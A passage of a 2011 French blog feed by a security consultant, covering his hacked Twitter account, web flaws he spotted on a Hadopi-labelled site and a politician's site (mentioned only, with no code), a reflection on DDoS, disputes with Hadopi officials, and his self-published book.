Les contributeurs recevront leur exemplaire dès que je les aurai moi-même reçus et je vous tiendrai au courant d’une soirée de lancement improvisée sur Paris dès que j’aurai quelques exemplaires à apporter sur place.

Encore merci à tous ceux qui m’ont aidé à faire fonctionner ce projet !

flattr this!

]]>
Compte Twitter piraté, comment réagirhttp://www.paulds.fr/?p=2119http://streisand.me.thican.net/paulds.fr/index.php?20110908_121017_Compte_Twitter_pirate__comment_reagirThu, 08 Sep 2011 10:10:17 +0000Les cordonniers sont toujours les plus mal chaussés. Je ne suis pas cordonnier mais expert en sécurité et c’est donc la deuxième fois que je me fais pirater cette année (et de ma vie BTW). Si la première avait été bon enfant et s’était faite de façon très sport, cette fois-ci on a affaire à un vilain méchant on dirait.

C’est mon compte Twitter qui a été la cible, cette nuit vers 1h30, d’une intrusion. Le méchant hacker (dont je ne connais pas l’identité, mais on y reviendra, d’ici là appelons le méchant hacker) a vraisemblablement mis la main sur mon mot de passe et a utilisé l’interface Web de Twitter pour publier le message suivant :

Bon à cette heure-ci j’étais en train de boire une bière (ou plus) avec des amis mais ne blâmons pas de suite notre méchant hacker : il m’est arrivé plusieurs fois de passer des nuits à hacker, pour le taff ou pour le plaisir (mais il ne faut pas mélanger). Ceci dit ici le message est clair, je dois me taire parce que je ne suis pas irréprochable.

Euh oui mais non… En effet, ce mot de passe est relativement faible car il s’agit d’un de mes mots de passe root (non pas pour mes machines, rassurez vous) : un mot de passe que je dérive entre plusieurs sites en fonction de ceux-ci (cf cet article). Le fait est que là, pour une raison qui m’échappe (Twitter n’interdit pas les caractères spéciaux) je l’avais laissé tel quel. Connerie de ma part, j’en conviens mais au moins je sais pourquoi.

J’ai cherché un peu à comprendre comment le méchant hacker s’en était débrouillé pour ouvrir cette porte et puis j’ai préféré fermer les autres. Il m’a donc fallu, toute la matinée durant, chercher tous les services sur lesquels j’utilise ce mot de passe root et les changer (merci c’était fun) ce que je fais de toutes façons de temps à autres.

Mais plus important, et vu que l’on parle de Twitter, il faut aussi révoquer toutes les autorisations des applications, laisser mourir le cache et re-connecter celles qui sont réellement utiles. De telle sorte que les 0Auth qui gèrent la connexion entre Twitter et les applications prennent bien en compte le changement de mot de passe et ne conservent pas un token périmé.

Si cela vous arrive et que vous utilisez ce mot de passe ailleurs, changez le en priorité. Des services les plus importants que j’ai vérifié ce matin je ne l’utilisais pas ailleurs et donc la personne n’a eu accès qu’à mes DM Twitter (rien de réellement confidentiel même s’il y avait des trucs perso supprimés depuis).

Finalement non je ne vais pas me taire, mais oui j’ai perdu une demi-journée pour un vilain kiddie que je suspecte grandement d’avoir bruteforcé un md5 trouvé je ne sais où… bravo donc à lui, si tu avais signé j’aurai même pu être sympa avec toi… Là j’ai demandé à Twitter qui est à l’origine du tweet en question et je te souhaite d’être passé par un minimum d’anonymisation, bisous méchant hacker :)

flattr this!

]]>
#Hadopi : La négligence labelliséehttp://www.paulds.fr/?p=2114http://streisand.me.thican.net/paulds.fr/index.php?20110906_183501__Hadopi___La_negligence_labelliseeTue, 06 Sep 2011 16:35:01 +0000Je n’aime pas être méchant (non vraiment) mais en même temps je n’aime pas me répéter non plus. Force est de constater que depuis des années (4 si l’on compte bien) nombreux sont ceux qui ont dit et répété que la Hadopi oubliait beaucoup de paramètres – certains sans même remettre en cause sa raison d’être (du moins l’officielle) : la lutte contre le partage…

Et puis il y a eu un espoir, la mission de la Hadopi prendrait aussi en compte la labellisation de l’offre légale et celle de moyens de sécurisation. J’ai espéré que du positif ressortirait de tout cela, que le consommateur aurait au moins un intérêt à la Hadopi…

Résultat la labellisation commence à tomber, elle a un nom à coucher dehors et à dormir debout (PUR pour ceux qui découvrent, après avoir été des pirates nous sommes maintenant des impurs) et est censée certifier à l’utilisateur que « oui ma bonne dame, ce site là il est gentil avec les artistes, pas comme ces pirates impurs qui tuent les artistes de qualitay que la star’ac a tellement de mal à pondre chaque année ! ».

Bon dans la réalité des faits on a déjà vu que tout cela était du bullshit (j’emprunte cette expression là aussi de qualitay à une amie journaliste qui se reconnaitra avec ses théories du complot) – dans la pratique c’est encore pire…

Sur son Twitter le site VODMania (que je ne connaissais pas, contre lequel je n’ai absolument rien et que je suis près à aider pro-bono sur le problème que je vais soulever ici) vient d’annoncer avoir reçu le si précieux label… Manque de chance, je suis sur le hashtag #Hadopi 24/7 (en moyenne, des fois plus) et forcément je veux voir de quoi il retourne – quel est ce site qui arborera bientôt fièrement un logo « culture-poubelle compliant » (aussi appelé le label « je préfère le clone de ton label PUR »).

Et là bonne et mauvaise surprise : le site a l’air intéressant, les contenus aussi… Mais la forme n’a manifestement pas été validée par notre chère Hadopi, toute juste rentrant de vacances. En quelques secondes l’on peut en effet exploiter un XSS béant pour injecter absolument ce que l’on veut dans le site y compris, au hasard, un lien vers un contenu qu’il n’est pas compliant du tout avec le clone du label d’Emma LePrince !

Donc en plus de ne se baser que sur une portion du catalogue (à partir d’un seul contenu ?) le label ne tient pas compte d’éventuels problèmes de sécurité du site lui-même… Au bout d’un moment on se demande à quoi il peut bien servir, mais rassurons nous : on n’a toujours aucune nouvelle des moyens de sécurisation de la connexion Internet et les premiers accusés sont finalement priés de rester chez eux.

C’est pas une odeur de présidentielle que je sens là ?

PS : merci de ne pas vous acharner sur cette plateforme…

flattr this!

]]>
La surveillance de Facebook par la Hadopi ? lol !http://www.paulds.fr/?p=2111http://streisand.me.thican.net/paulds.fr/index.php?20110825_120844_La_surveillance_de_Facebook_par_la_Hadopi___lol__Thu, 25 Aug 2011 10:08:44 +0000Vous connaissiez 3M et ses propositions farfelues, voici maintenant 3B qui me semble bien décidé à détrôner notre Muriel préférée (jamais accroché avec Muriel Robin). Introducing : Bruno Bourg Broc !

Ce cher monsieur 3B s’est réveillé le matin du mardi 23 août, visiblement de mauvaise humeur, et s’est demandé (donc a demandé au ministre de la culture) si les réseaux sociaux finalement c’était si bien que ça… Bon passons sur la pertinence de la question, je vous laisse seul juge, là où cela devient drôle c’est quand ledit député (et on va revenir sur son parcours) suggère carrément que l’on envisage d’attribuer une mission de surveillance de ces réseaux par la Hadopi.

Rappelons au passage que le but de la Hadopi n’a jamais été de lutter réellement contre le piratage mais bien de faire peur. Peur qui sera ensuite exploitée pour nous vendre de la « sécurité » basée sur la surveillance de votre « connexion internet » qu’il ne faudrait surtout pas négliger de façon caractérisée !

Et du coup forcément, la mission de la Hadopi devient beaucoup plus claire si l’on décide de lui adjoindre un peu de LOPPSI ou d’Arjel (censure) ou maintenant, comme le suggère 3B, de surveillance des réseaux sociaux. Pour rappel ce monstre à plusieurs têtes a existé  par le passé et est en passe d’être remis en route, il s’appelle Ammar404

Une pareille proposition ne peut-être ressentie que comme une négation du rôle des réseaux sociaux dans le printemps Arabe ou pire : comme un aveux de la peur des responsables français d’un même phénomène, pourtant salué par ces mêmes politiques quand arrivant à l’étranger (et bien sûr après que cela soit arrivé, ne nous mouillons pas trop tant que l’issue est incertaine).

Malheureusement pour monsieur 3B certains citoyens ont commencé à surveiller eux-même les politiques et la fiche dudit député sur le site de Regards Citoyens nous en apprend pas mal sur l’assiduité de la personne notamment.

Pire le site du monsieur fait preuve manifeste de négligence caractérisée puisque des failles de type XSS et injection SQL (non là pas de lien, mais j’enverrai un mail dans la journée) ont été très vite signalées sur Twitter (saloperie de réseaux sociaux !)…

Bref, balayer devant sa porte et avoir un minimum de connaissances du sujet traité peut-être intéressant avant de lancer de tels pavés dans une marre déjà pleine de remous…

flattr this!

]]>
La psychose de la fin de l’internet illimitéhttp://www.paulds.fr/?p=2109http://streisand.me.thican.net/paulds.fr/index.php?20110821_130456_La_psychose_de_la_fin_de_l___internet_illimiteSun, 21 Aug 2011 11:04:56 +0000Vendredi dernier (19 août) Owni sortait un article sobrement intitulé « la fin de l’internet illimité » présentant l’entente en cours de nos chers amis de chez France Telecom (Orange), Bouygues et SFR sur une nouvelle segmentation des offres grand public qui pourraient introduire des paliers maximums de consommation en débit (vitesse) et en données (quantité).

Je n’ai rien à reprocher à l’article en lui-même (à ceci près que le dernier paragraphe qui est la clef de tout aurait du être un peu plus mis en avance à mon goût) et c’est même plutôt intéressant de glisser un oeil dans la serrure pour regarder comment les FAI se préparent ensemble (euh on a pas une loi contre ce type de pratiques en France ?) à la mettre profond au consommateur.

Ce que je déplore par contre ce sont les réactions à cet article alors que tout ce qui y est abordé est déjà en place et que bien pire se prépare depuis des années déjà…

On a vu récemment l’exemple de Orange qui se tire joyeusement la bourre avec Megaupload, Youtube eux aussi pourris par Free, SFR et Orange ou encore Dailymotion par Neuf

Bref la guerre des tuyaux a bien commencé depuis des années et le consommateur en souffre déjà, certes de façon moins visible et plus technique, par du bridage, du contrôle de débit sur ce que vous pouvez vouloir consommer et bientôt même sur du filtrage (thanks Hadopi).

Alors que là on parle de nouvelles offres, qui ne pourront venir qu’en complément des précédentes et à un tarif inférieur sous peine de voir une majorité des clients se sauver (cf. l’exemple sur la répercution e la TVA sur le mobile). Bref l’apparition de l’Internet par services gérés sur le fixe – ce qui de toute façon est au programme avec nos chères télé-connectées par exemple et restera dans tous les cas un choix du consommateur final.

La clef de l’article, le dernier paragraphe donc, est bien que Free n’est pas consulté par les autres opérateurs dans leurs petites magouilles. Il s’agit donc de proposer une offre qui puisse entrer en concurrence avec la (/les bientôt ?) offre de Free et pas torpiller d’un coup les 3 opérateurs qui ont déjà du mal à vendre leurs box à des clients qui associent de plus en plus free à un monsieur bizarre, mais qui a « tout compris ». Preuve en est que ce type de réunions pour accord sur les offres et tarifs (encore une fois, réunion tout ce qu’il y a de plus illégal) se tient en l’absence du casseur de prix.

Soit dit en passant, la solution à cette surcharge du réseau qui pousse les opérateurs vers ce type de mesures – ou d’autres encore pires – est une meilleure répartition de ladite charge. Et je connais justement une technologie, en plein développement, qui réparti beaucoup mieux la charge que ce que l’on connait actuellement sur le réseau… Dommage que je connaisse aussi une Haute Autorité qui a pour seul but de l’interdire et de la diaboliser…

flattr this!

]]>
Petite réflexion sur le DDOS à l’heure de l’immédiatetéhttp://www.paulds.fr/?p=2100http://streisand.me.thican.net/paulds.fr/index.php?20110816_111654_Petite_reflexion_sur_le_DDOS_a_l___heure_de_l___immediateteTue, 16 Aug 2011 09:16:54 +0000Vous le savez probablement si vous trainez dans le coin de temps en temps, par principe je suis opposé au DDOS – j’ai fulminé en lisant la réflexion de RMS sur le sujet et puis comme souvent je me suis remis en question – qu’est-ce qu’un DDOS de nos jours au sein de notre société ?

Déjà posons les prémisses : je n’aime pas la comparaison avec une manifestation de RMS. Laissons au matériel ses modèles anciens et réfléchissons sur de nouvelles bases quand on aborde l’immatériel, ça ne peut-être que plus sain.

Ensuite : ce que je reproche au DDOS est principalement d’être de la censure unilatérale d’un moyen de communication (appartienne-t-il à un dictateur, je préfère que tous puissent le voir s’exprimer) sous la pression d’une masse pas nécessairement représentative de qui / quoi que ce soit. En l’espèce c’est donc une forme de gouvernance par la terreur « be good ou on te censure » – Mais en même temps je considère la politique moderne comme une forme de terrorisme aussi (je reviendrai un jour sur ce principe).

Et puis d’un autre côté on a un certain nombre de gouvernements, d’institutions, de monopoles en tout genre inatteignables au quotidien, pour certaines institutions dans certains pays on peut espérer apporter un peu de sa voix toutes les x années, pour beaucoup on a plutôt intérêt à se taire… Et à côté de cela l’actualité avance, elle va même à une vitesse jamais égalée et est accessible par (presque) tous.

Alors que faire ? Sachant que l’on a un outil qui nous donne une voix toutes les x années et un autre qui nous permet de réagir instantanément, sans compétence particulière, sans limite d’âge, de nationalité ? Comment résister à cet appel qui pourrait se résumer à « le pouvoir par le peuple et pour le peuple » si tous s’y mettaient demain (ce serait un beau bordel mais je serai curieux de voir ça).

Je reste opposé au DDOS dans son principe, je suis ravi de le voir reculer ces derniers temps mais finalement je comprends la démarche et suis attristé de voir la chasse aux sorcières lancée contre ceux qui n’ont fait que donner un outil (qui existait déjà depuis bien longtemps, hping3 au hasard) à d’autres pour s’exprimer.

Bref comme la comparaison dont on parlait au début avec une manifestation, la comparaison avec du vandalisme souvent lancée dans les médias par les autorités ne me paraît pas justifiée et il est temps de réfléchir à une alternative permettant aux gens de prendre la parole plus simplement dès qu’ils le veulent plutôt que de taper sur ceux qui le font avec les outils que leur donne « le camp d’en face »…

flattr this!

]]>
Pirate Parfum – Quand le piratage s’attaque au luxe (avec brio)http://www.paulds.fr/?p=2088http://streisand.me.thican.net/paulds.fr/index.php?20110812_151312_Pirate_Parfum_____Quand_le_piratage_s___attaque_au_luxe__avec_brio_Fri, 12 Aug 2011 13:13:12 +0000Si l’on m’avait dit que j’écrirai un jour sur du parfum je me serai senti obligé de devenir violent (au moins verbalement) avec le médisant… Mais bon tout arrive et, vous l’aurez compris, aujourd’hui je vais vous parler d’une toute nouvelle entreprise 2.0 pirate… qui fait du parfum !

Alors entrons tout de suite dans le vif du sujet : la contrefaçon (la vraie, celle qui se fait passer pour l’original et qui trompe le consommateur) c’est mal ! Mais bien entendu ce n’est pas ce que font nos amis de Pirate Parfum – bah oui sinon je ne vous en parlerai pas !

L’idée est extrêmement simple : un parfum actuellement c’est 95% de marketing, 5% de matière première et 100% de prix exorbitant. Partant de là pourquoi ne pas essayer de pirater le marché et de renverser la balance pour obtenir un produit toujours aussi qualitatif, inspiré parfois de ce qui existe déjà (publicité comparative, pas plagiat) mais bien plus accessible ?

Je suis entré en contact avec le responsable de la façon qui m’a fait entrer en contact avec tellement de monde par le passé : je leur ai signalé une faille sur leur site après avoir découvert le concept grâce à Twitter (so 2.0 ! so Pirate !). La réaction a été très rapide, la faille corrigée et la réponse plus que cordiale :

[…] Donnez moi votre parfum et vos cordonnées je vous envoi un parfum pour vous remercier.[…]

On a ensuite discuté un certain temps sur la philosophie derrière la boite, les profils très compétents qui l’ont lancée, le futur et tout cela m’a donné un très bon sentiment sur leur démarche comme sa réalisation. Je n’avais plus qu’à attendre mon Dubai, inspiré de l’Armani Code qui me coûte un bras à chaque fois que je me décide à l’acheter.

C’est chose faite aujourd’hui et je découvre avec plaisir un beau produit, bien fini et une flagrance très proche de ce que je n’achèterai plus à compter de maintenant (je préfère le packaging de Pirate Parfum en plus, je sais pas pourquoi).

Ah si j’ai une vague idée !

Alors comme on m’a appris que, si tu veux rester crédible, il faut aussi critiquer – mon seul regret à l’heure actuelle reste qu’il faudrait, pour que la démarche soit complète, que les recettes utilisées pour la confection des parfums soit rendue publique voire diffusée sous licence libre. Là alors nous aurions un vrai produit 100% pirate. La remarque a été soumise, wait & see !

En attendant, le rendez-vous des Pirates qui sentent bon c’est ici.

flattr this!

]]>
Lettre ouverte à François Hollande à propos de #Botzaris36http://www.paulds.fr/?p=2074http://streisand.me.thican.net/paulds.fr/index.php?20110810_103012_Lettre_ouverte_a_Fran__ois_Hollande_a_propos_de__Botzaris36Wed, 10 Aug 2011 08:30:12 +0000Le 20 Juillet 2011 François Hollande, candidat à la présidentielle française se disait préoccupé par la situation à Botzaris et promettait sa venue « dans les prochains jours ». Force est de constater que les jours en question ont passés et que la situation n’a fait que se détériorer avec notamment sa passive complicité.

Monsieur Hollande,

Vous êtes un Homme de gauche, quelqu’un dont le rôle en politique est de représenter les valeurs de l’Humain avant celles du système. Pire vous avez dirigé ce parti de gauche qu’est le PS pendant 11 ans ce qui devrait normalement rassurer vos futurs électeurs sur vos engagements en ce sens.

Les Français se lassent de la politique, de ses promesses jamais réalisées, de ses extravagances et de sa relative inefficacité sur les sujets qui les préoccupent directement.

Votre parti lui-même s’est souvent élevé contre la politique du tout répressif ainsi que celle de la stigmatisation des étrangers ou mêmes des Français qui ont le malheur de ne pas avoir un nom de famille ou un prénom qui sonne « bien de chez nous » , une couleur de peau légèrement plus foncée que ce que le ministère de l’immigration peut supporter.

Botzaris c’est justement ce cocktail là, ce mélange de racisme latent avec une politique qui prime sur l’Humain, un système corrompu qui risque d’être mis à mal par la révélation de documents compromettant et sa conséquence logique : la protection de ces racailles (le terme est beaucoup plus approprié ici que dans la bouche de notre président il me semble) au détriment d’une centaine de jeunes ayant risqué leur vie pour essayer de toucher du doigt ce rêve européen qui a aujourd’hui un goût amer pour eux.

Botzaris c’est ceci et uniquement ceci.

Aujourd’hui les documents ont disparu, les racailles des palais présidentiels et du parlement sont saufs, leurs réputations respectives ne seront pas entamées le moins du monde grâce à la passivité de ceux qui auraient du réagir vite et faire en sorte que ces documents ne s’évaporent pas dans la nature. Mais surtout c’est là le fait de ceux qui pouvaient réagir pour se débarrasser de ces documents et qui l’ont fait eux, très vite, et au détriment de vies humaines…

Alors que reste-t-il de Botzaris finalement ? Très pragmatiquement que peut vous apporter cette affaire ?

D’abord vous vous êtes engagé à venir. Un engagement dans la bouche d’un présidentiable n’a pas la même valeur que dans celle d’un simple citoyen. Et pourtant ce sont eux que l’on a vu au parc des Buttes Chaumont, eux qui se sont engagés et qui ont donné de leur temps, de leur argent, de leur santé…

Enfin le risque est passé, vos amis comme vos ennemis n’ont plus rien à craindre de ce sujet brulant ou de ces documents jadis intéressants tant pour la Tunisie et son histoire que pour la France et son devenir. Ainsi vous pourriez mettre le premier coup de pied dans une fourmilière que vous dénoncez vous aussi sans autre risque que celui de démarrer quelque chose de grand et de salvateur dans notre France : un bon coup de Karcher là où la politique ne va jamais nettoyer, dans ses propres rangs.

A bon entendeur et très cordialement,
Paul

flattr this!

]]>
Support de cours sécurité PHP + nouvelles du fronthttp://www.paulds.fr/?p=2061http://streisand.me.thican.net/paulds.fr/index.php?20110730_164959_Support_de_cours_securite_PHP___nouvelles_du_frontSat, 30 Jul 2011 14:49:59 +0000Bonjour à toutes et à tous, c’est les vacances, cette période maudite où l’actualité s’arrête et où les infos ne parlent plus que de la circulation sur les autoroutes ou de la température de l’eau… Bref pas grand chose à se mettre sous la dent, donc je suis plus ou moins au chômage technique de l’hactivisme en ce moment.

Le temps est donc rêvé pour un petit point rapide sur mes projets du moment et pour vous donner un petit cadeau intemporel : mon support pour les cours donnés à l’Hetic en fin de l’année scolaire passée (super expérience d’ailleurs).

Hop, ça c’est fait ! Licence CC-BY, faites vous plaisir ;)

J’en profite aussi pour vous annoncer que j’ai commencé à travailler sur un livre à ce sujet que je pense boucler dans un an (beaucoup de taff et puis ce n’est pas comme si je n’avais que ça sur le feu). J’ai déjà des pistes pour un éditeur mais ne vendons pas la peau de l’ours avant d’avoir signé le contrat… Je ne sais pas encore sous quelle forme il sortira mais son contenu sera de toute façon diffusé sous Creative Commons et en version numérique gratuite (impératif de ma part à la signature d’un quelconque contrat d’édition).

L’idée sera de prendre la problématique du point de vue de l’attaquant dans un premier temps et de couvrir les problématiques les plus fréquentes afin qu’un dev moyen ou expérimenté, après avoir lu ce bouquin soit à la fois un hacker chevronné et un meilleur dev capable de sécuriser ses applis…Tout un programme :)

D’ailleurs je prépare actuellement ma formation en sécurité PHP de lundi (oui c’est mon nouveau boulot qui me plait beaucoup je dois bien l’avouer, donc un backlink offert).

Piratons la démocratie quand à lui est dans les startings blocks mais en pause : j’ai plusieurs coquilles à corriger et le sortir maintenant serait suicidaire (il ne se passe jamais rien en août) – aussi j’attendrai septembre pour boucler les dernières étapes. Tout est déjà réglé et je n’ai plus qu’à lancer le processus d’impression mais pour cela il faut que je repasse sur le PDF et je ne peux pas le faire pour le moment (y’a un certain graphiste qui est en vacances et que je ne veux pas déranger :p).

Je mettrais bientôt en place le site attaché à Piratons la démocratie (et à mes autres bouquins d’ailleurs) mais pour cela j’aimerai qu’il soit déjà disponible en version papier (si vous saviez comme je suis impatient !).

Mon roman quant à lui est en stand-by : j’ai du mal à me replonger dans l’histoire après l’avoir délaissé plusieurs mois :/

J’ai aussi un autre projet dans la lignée de Piratons la démocratie qui décrypte un peu le phénomène de l’hacktivisme de l’intérieur et en se basant sur mon expérience et celle de plusieurs de mes amis dans le milieu aussi… Gros boulot en perspective là aussi, j’ai un début de sommaire mais je veux avoir sorti Piratons la démocratie avant de m’y mettre…

Bref à la relecture de ce billet je me rends compte que plus ça va et plus j’écris, donc je suis content :) (ça c’est de la conclusion à deux balles non ? M’enfin y’en a qui sont en vacances alors hein !)

flattr this!

]]>
Quand l’Hadopi n’assume plus d’avoir essayé d’acheter des opposantshttp://www.paulds.fr/?p=2055http://streisand.me.thican.net/paulds.fr/index.php?20110722_140430_Quand_l___Hadopi_n___assume_plus_d___avoir_essaye_d___acheter_des_opposantsFri, 22 Jul 2011 12:04:30 +0000Hier j’ai eu la chance d’être convié à la présentation du plan France Numérique 2020 au ministère de l’Economie, des Finances et de l’Industrie. Outre les petits fours (depuis le temps que je voulais goûter des macarons fauchon ^^) et le bon vin je retiendrai une réelle volonté d’ouverture (ne serait-ce que par ma présence et celle de représentants de sociétés d’auteurs dans la même salle) et un début de clash sur Twitter avec Eric Walter (secrétaire général de la Hadopi) auquel j’ai fini par arrêter de répondre devant la mauvaise foi de celui-ci et le débat que j’étais venu suivre qui se poursuivait en face. Je profite donc de mon blog pour revenir sur le « clash » en question de façon plus argumentée et construite que les classiques 140 caractères me le permettent.

Tout est parti de l’interrogation légitime de Benjamin Bayart sur le fait qu’il n’ait pas été invité à la cérémonie d’hier, il a alors tweeté « Ils n’invitent que les geeks qui acceptent l’argent de l’#hadopi ? » et je me suis donc empressé de répondre que je n’avais jamais accepté de l’argent de la Hadopi, bien que ceux-ci me l’aient proposé à plusieurs reprises. La réponse ne se fit pas attendre, et ce même si Eric Walter a récemment décidé de me bloquer sur Twitter au motif que je le mettais trop souvent en copie avant que je ne lui explique au téléphone que son blocage avait aussi comme conséquence de m’empêcher de le suivre… Je le cite : « laquelle #hadopi ne vous en a jamais proposé d’ailleurs ;)  ».

Manque de chance, j’ai une mémoire terrible et donc je note tout ce qui peut avoir de l’importance sur ce sujet dans un joli fichier oowriter (de plusieurs dizaines de pages) que je conserve en sécurité tant les pratiques de la Hadopi sont douteuses. Je n’avais jusque là pas ressenti le besoin d’en parler, puisque finalement ils gèrent leur business comme bon leur semble mais laisser quelqu’un qui a justement tenté de m’acheter (haha quand on sait ce que je pense de l’argent…) me traiter publiquement de menteur est juste au dessus de mes forces…

Ma première rencontre avec Eric Walter a eu lieu chez eux, en octobre 2010 et a duré plusieurs heures (5 pour être précis). Elle faisait suite à une conférence de presse au cours de laquelle déjà Eric (je le vouvoie toujours pour conserver de la distance avec lui mais pour éviter de surcharger le texte l’on va se contenter du prénom) m’avait proposé de rejoindre les labs.

Au cours de notre entretien il réitérera cette proposition à plusieurs reprises, restant volontairement dans le flou sur le poste exact qui m’était proposé. Le lab « Internet et société » a été évoqué mais rien de particulier sur l’intitulé du poste. A ce moment là les postes d’experts associés n’étaient pas au programme et Turblog (/Spyou) qui était dans la même pièce que moi s’est vu proposer grosso-modo les mêmes choses que moi, et l’on sait comment cela s’est fini (avec tout le respect que j’ai pour la démarche et la personne de Turblog).

Dans le même temps des budgets ont été débloqués pour des marchés relevant des missions de l’Hadopi dont un était la création d’un portail d’information sur les moyens de sécurisation de la connexion. Ce budget à 7 chiffres a été proposé à nouveau à des opposants pour la réalisation dudit portail. Il était clairement sur-dimensionné et lesdits opposants l’ont donc refusés (je ne donnerai pas de noms, ne les ayant pas associé à la démarche qui est derrière cet article).

Dans un moment d’égarement et d’humour noir j’avais répondu à l’offre d’emploi de community manager de la Hadopi (lisez le texte avant d’hurler, je ne voulais pas vraiment ce poste hein !) sur mon blog. J’ai donc logiquement été contacté à nouveau par Eric (en DM twitter) qui me demandait, sur le ton de l’humour, quelles étaient mes prétentions salariales. Gageons que si j’avais répondu un chiffre l’humour aurait vite disparu de la discussion. Ma réponse fut plus simple : « vous n’avez pas assez de budget pour m’acheter ».

Un peu plus tard, lors de la sortie du site hadopi.fr, des opposants ont jugé opportun de revoir la FAQ du site qui était pleine de désinformation et se sont, par conséquent, vu proposer de l’argent en rétribution de ce travail. Qu’on s’entende bien, cela est normal, mais je suis convaincu que cela n’était pas nécessaire et, d’un point de vue strictement éthique, risqué pour les deux parties. Je ne sais pas ce que cet argent a fini par devenir mais là encore la Hadopi en la personne d’Eric ont vu large avec le chéquier.

Et enfin tout récemment, quelques jours avant la sortie de la campagne de publicité propagande de la Hadopi, Eric m’a appelé pour me demander si j’acceptais « un travail de la part de la Hadopi » (et ce sont là ses mots). J’ai bien sûr commencé par répondre par la négative avant qu’il m’explique qu’il désirait un avis très critique sur la campagne à venir. J’ai alors accepté à la seule réserve que l’on ne me demande pas d’accepter de l’argent pour ceci. Il me répondra que je suis pourtant en droit de le demander… Finalement pour des raisons d’emploi du temps j’ai découvert les pubs en même temps que vous, avec probablement la même grimace…

Je ne parle ici que de quelques faits, ils sont multiples et tous aussi troubles… Donc monsieur Walter, merci de ne pas me prendre pour un con et d’assumer votre démarche, aussi contestable soit-elle.

Et puisque l’on est dans le full disclo, il est bon de savoir qu’à chaque opposant qu’il a rencontré et que je connaisse, Eric s’est présenté comme anti-hadopi…

flattr this!

]]>
Haterz gonna hatehttp://www.paulds.fr/?p=2051http://streisand.me.thican.net/paulds.fr/index.php?20110715_201300_Haterz_gonna_hateFri, 15 Jul 2011 18:13:00 +0000On m’avait prévenu : quand tu commences à avoir un tout petit peu de visibilité, tu manges. Des fois c’est constructif, d’autres fois c’est destructif. Ces derniers temps et alors que jusque-là le côté destructif était plutôt rare, les haterz se sont déchaînées et j’en ai pris plein la gueule… Je m’en branle :)

Rapide tour d’horizon de ces preuves d’intelligence : j’ai été un troll, un nanti, un énorme con (celle là est d’aujourd’hui), un fils de l’immigration donc quelqu’un qui n’a pas à donner son avis sur la France, un lâche, … Ouais non je vais pas toutes vous les faire.

Alors comment on réagit face à ça ? Franchement ça fait bizarre au début, j’ai eu envie de tout plaquer et de fermer tous mes moyens d’expression plusieurs fois ces derniers temps… Et puis merde ! Y’a pas le choix il vaut mieux s’en foutre…

Alors je vous le dis clairement : j’aime les avis contradictoires, ça me fait plaisir de pousser la réflexion au-delà de ce que je sais déjà, mais si c’est pour m’insulter je vais clairement saturer et fonction de mon humeur vous ignorer royalement ou m’énerver à mon tour. Heureusement je suis un mec difficile à énerver normalement, malheureusement quand je m’énerve ça chie des bulles.

Si je vous ignore ce n’est donc pas que je prends la grosse tête (ah oui tiens je l’ai lue quelque part aussi celle-là) mais que je garde mon calme, mieux vaut pas trop me titiller dans ce cas ;)

A bon entendeur, bisou !

flattr this!

]]>
Une version (beaucoup) plus propre de Piratons la démocratiehttp://www.paulds.fr/?p=2045http://streisand.me.thican.net/paulds.fr/index.php?20110713_181401_Une_version__beaucoup__plus_propre_de_Piratons_la_democratieWed, 13 Jul 2011 16:14:01 +0000J’ai bien lu depuis hier que le livre a « leaké » chez Korben toutes les remarques sur le fond mais surtout sur la forme. Si les remarques sur le fond me parlent, c’est surtout celles sur la forme que j’aimerai voir disparaitre (bah oui c’est un peu con et je dois bien avouer m’être merdé sévère sur la mise en page – c’est un métier mes enfants !).

Aussi je publie aujourd’hui une version beaucoup plus lisible mise en page par Geoffrey Dorne. Il reste des coquilles orthographiques qui m’ont été signalées et seront corrigées, mais déjà le format devrait permettre de se concentrer sur le fond.


Piratons la démocratie

Je suis ravi de voir les discussions soulevées par cet écrit et je tiens à préciser une chose (qui est écrite dans la partie « principe du livre ») : il s’agit de susciter le débat et pas d’apporter des solutions, ce que je me refuse à faire. La cible n’est pas non-plus les avertis que l’on touche déjà à travers de nos blogs ou médias spécialisés traditionnels (même si je serai ravi qu’ils participent au débat) mais bien madame Michu, qui elle n’ira pas sur Numerama ou PCINpact pour se renseigner sur le sujet et pourra par contre être intéressée par un petit livre qui se lit vite et qui est en plus gratuit si elle demande à son fils de le lui imprimer (version en texte brut sortie en même temps que l’édition papier).

En passant, après la lecture n’hésitez pas à remplir la fiche créée sur Sens Critique.

flattr this!

]]>
Piratons la démocratie bientôt disponible chez voushttp://www.paulds.fr/?p=2037http://streisand.me.thican.net/paulds.fr/index.php?20110712_072921_Piratons_la_democratie_bientot_disponible_chez_vousTue, 12 Jul 2011 05:29:21 +0000C’est avec beaucoup d’émotion (j’en ai tremblé et j’ai même versé une larme) que j’ai hier lancé l’impression de mon premier livre : Piratons la démocratie. Je vous en avais déjà parlé ici et il ne me manquait plus grand chose pour finaliser la sortie de ce livre qui j’espère vous plaira.

Dans la foulée je l’ai hier envoyé à tous ceux qui m’ont aidé tant par un soutien financier sur Ulule que par des apports d’idées lors de la rédaction ou avant (et donc forcément j’ai oublié du monde, désolé). Le mail envoyé était le suivant :

Bonjour à toutes et tous,

Avant tout je tiens encore une fois à vous remercier pour votre participation à cet ouvrage, qu’elle soit financière ou par des apports d’idées, de contenus, de discussions,…

Vous trouverez en pièce jointe et en avant-première (j’ai lancé l’impression ce soir) la version numérique du livre que je vous encourage à pirater, à partager, … bref à en faire ce que bon vous semble.

Les mots me manquent face à ce que la publication de ce livre représente pour moi. Je ne saurai jamais assez vous remercier pour votre contribution.

Je vais donc aller à l’essentiel : certains d’entre vous doivent recevoir une version papier du livre. Pour ceux-ci merci de me donner votre adresse (certains l’ont déjà fait, ignorez donc cette partie du mail) pour que je puisse vous faire parvenir le livre dès que je l’aurai reçu.

De tout mon cœur et quitte à me répéter un peu : merci.

Paul

J’espère donc très bientôt le voir en téléchargement un peu partout… Ce qui a d’ailleurs commencé :)

D’ici peu le livre sera disponible au format papier, sous licence CC-by (ILV ne propose pas le CC0, je vais voir si c’est possible quand même sinon tant pis :/) pour un prix de 2.60€, sans aucun droit d’auteur, alors qu’il restera gratuit en version numérique.

Je vais aussi monter un forum de discussion sur http://livres.paulds.fr pour que la discussion puisse prendre part sur ce livre et sur mes suivants. J’ai hâte de revivre cette émotion de voir le projet prendre vie et plus encore de recevoir les 45 exemplaires commandés hier !

Il faut aussi que je lance la traduction de l’ouvrage en anglais et l’impression dans cette langue. Si vous souhaitez le traduire dans une autre langue vous avez bien-sûr ma bénédiction !

Encore un grand merci à tous !

flattr this!

]]>
